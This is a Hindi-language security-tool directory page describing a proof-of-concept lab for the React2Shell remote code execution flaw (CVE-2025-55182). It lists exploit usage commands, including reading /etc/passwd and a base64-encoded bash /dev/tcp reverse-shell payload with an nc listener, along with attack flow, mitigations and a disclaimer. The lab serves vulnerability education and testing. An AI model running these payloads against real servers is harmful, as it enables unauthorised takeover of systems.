Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
react2shell-lab — CVE-2025-55182 React2Shell PoC lab | Kitploit
उपकरण/GitHubGitHub/alsaut1/react2shell-lab
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & EducationRemote Access ToolPayload DevelopmentLabs & Practice
GitHubalsaut1/react2shell-lab

react2shell-lab

78 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 React2Shell PoC lab

रिपॉजिटरी देखें

React2Shell - CVE-2025-55182 प्रयोगशाला

React सर्वर घटकों में गंभीर भेद्यता CVE-2025-55182 को प्रदर्शित करने और परीक्षण करने के लिए एक व्यापक प्रयोगशाला।

⚠️ केवल शैक्षिक उद्देश्य

यह रिपॉजिटरी इसके लिए अभिप्रेत है:

  • सुरक्षा अनुसंधान और शिक्षा
  • भेद्यता तंत्र को समझना
  • अपने स्वयं के सिस्टम पर परीक्षण
  • बग बाउंटी हंटिंग की तैयारी

उन सिस्टमों के विरुद्ध उपयोग न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है। अनधिकृत पहुँच अवैध है।

🔴 भेद्यता विवरण

  • CVE ID: CVE-2025-55182
  • CVSS स्कोर: 10.0 (गंभीर)
  • प्रकार: अप्रमाणित रिमोट कोड निष्पादन (RCE)
  • प्रभावित घटक:
    • React 19.0.0 - 19.2.0
    • Next.js 15.x - 16.x
  • मूल कारण: React सर्वर घटकों "Flight" प्रोटोकॉल में असुरक्षित डिसेरियलाइज़ेशन

⚡ क्षमताएँ

✅ बिना प्रमाणीकरण के मनमाने कमांड निष्पादित करें
✅ सिस्टम फ़ाइलें पढ़ें
✅ फ़ाइलें बनाएं और संशोधित करें
✅ रिवर्स शेल कनेक्शन स्थापित करें
✅ पूर्ण सर्वर नियंत्रण प्राप्त करें

🚀 त्वरित आरंभ

1. स्थापना

root@kitploit:~
npm install --legacy-peer-deps
npm run dev

सर्वर http://localhost:3000 पर शुरू होगा

2. भेद्यता जांचें

root@kitploit:~
bash check-cve.sh

3. एक्सप्लॉइट चलाना

root@kitploit:~
cd exploit
python3 rce_final.py "whoami"
python3 rce_final.py "id > /tmp/id.txt &"
python3 rce_final.py "cat /etc/passwd > /tmp/passwd.txt &"

4. रिवर्स शेल

root@kitploit:~
# टर्मिनल 1 - श्रोता
nc -lvnp 4444

# टर्मिनल 2 - एक्सप्लॉइट
python3 rce_final.py "echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx | base64 -d | bash &"

📁 परियोजना संरचना

root@kitploit:~
├── app/              # भेद्य Next.js एप्लिकेशन
├── exploit/          # कार्यशील PoC एक्सप्लॉइट
│   └── rce_final.py  # मुख्य एक्सप्लॉइट स्क्रिप्ट
├── check-cve.sh      # स्वचालित भेद्यता जाँचकर्ता
├── package.json      # भेद्य निर्भरताएँ
└── README.md

🔧 तकनीकी विवरण

भेद्यता React सर्वर घटकों के पेलोड के डिसेरियलाइज़ेशन लॉजिक में मौजूद है। एक्सप्लॉइट process.mainModule.require('child_process').execSync() के माध्यम से मनमाना कोड निष्पादित करने के लिए प्रोटोटाइप प्रदूषण का लाभ उठाता है।

हमला प्रवाह

  1. दुर्भावनापूर्ण मल्टीपार्ट फॉर्म डेटा तैयार करें
  2. भेद्य React एप्लिकेशन पर भेजें
  3. "Flight" प्रोटोकॉल में असुरक्षित डिसेरियलाइज़ेशन का शोषण करें
  4. सर्वर पर RCE प्राप्त करें

📊 प्रभाव

  • गोपनीयता: उच्च (कोई भी फ़ाइल पढ़ें)
  • अखंडता: उच्च (फ़ाइलों को संशोधित/बनाएं)
  • उपलब्धता: उच्च (सेवा अस्वीकार कमांड निष्पादित करें)

✅ शमन

  1. React को 19.2.1 या बाद के संस्करण में अपडेट करें
  2. Next.js को 15.0.5+ या 16.0.7+ में अपडेट करें
  3. वेब एप्लिकेशन फ़ायरवॉल (WAF) नियम तैनात करें
  4. शोषण प्रयासों के लिए सर्वर लॉग की निगरानी करें
  5. रनटाइम सुरक्षा तंत्र का उपयोग करें

📚 संदर्भ

  • react2shell.com
  • CVE-2025-55182 विवरण
  • React सुरक्षा सलाह
  • CVSS कैलकुलेटर

⚖️ कानूनी अस्वीकरण

यह कोड केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उपयोगकर्ता किसी भी सिस्टम का परीक्षण करने से पहले उचित प्राधिकरण सुनिश्चित करने के लिए जिम्मेदार हैं। कंप्यूटर सिस्टम तक अनधिकृत पहुँच कंप्यूटर फ्रॉड और एब्यूज़ एक्ट (CFAA) और अन्य क्षेत्राधिकारों में समान कानूनों जैसे कानूनों के तहत अवैध है। लेखक इस जानकारी के दुरुपयोग के लिए कोई दायित्व नहीं मानता है।

🎓 सीखने के परिणाम

इस प्रयोगशाला के माध्यम से काम करने के बाद, आप समझ जाएंगे:

  • असुरक्षित डिसेरियलाइज़ेशन भेद्यताएँ कैसे काम करती हैं
  • प्रोटोटाइप प्रदूषण आक्रमण तकनीकें
  • React सर्वर घटकों की वास्तुकला
  • RCE शोषण विधियाँ
  • उचित भेद्यता प्रकटीकरण अभ्यास
टूल डाउनलोड करें